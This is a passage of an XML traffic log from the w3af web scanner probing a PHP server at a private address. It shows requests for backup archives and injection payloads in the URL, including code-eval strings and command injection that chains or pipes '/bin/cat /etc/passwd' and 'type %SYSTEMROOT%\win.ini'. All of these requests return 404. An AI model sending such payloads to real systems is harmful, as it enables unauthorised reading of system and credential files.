h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="244">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="245">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="246">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="247">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="248">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="249">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="250">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="251">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="254">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="258">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/print+%27zzrpn%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="259">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/echo+str_repeat%28%27zzrpn%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="260">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/print+%27zzrpn%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="261">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Response.Write%28new+String%28%22zzrpn%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22zzrpn%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="263">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="264">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="266">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="268">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="270">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="271">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="272">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="273">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
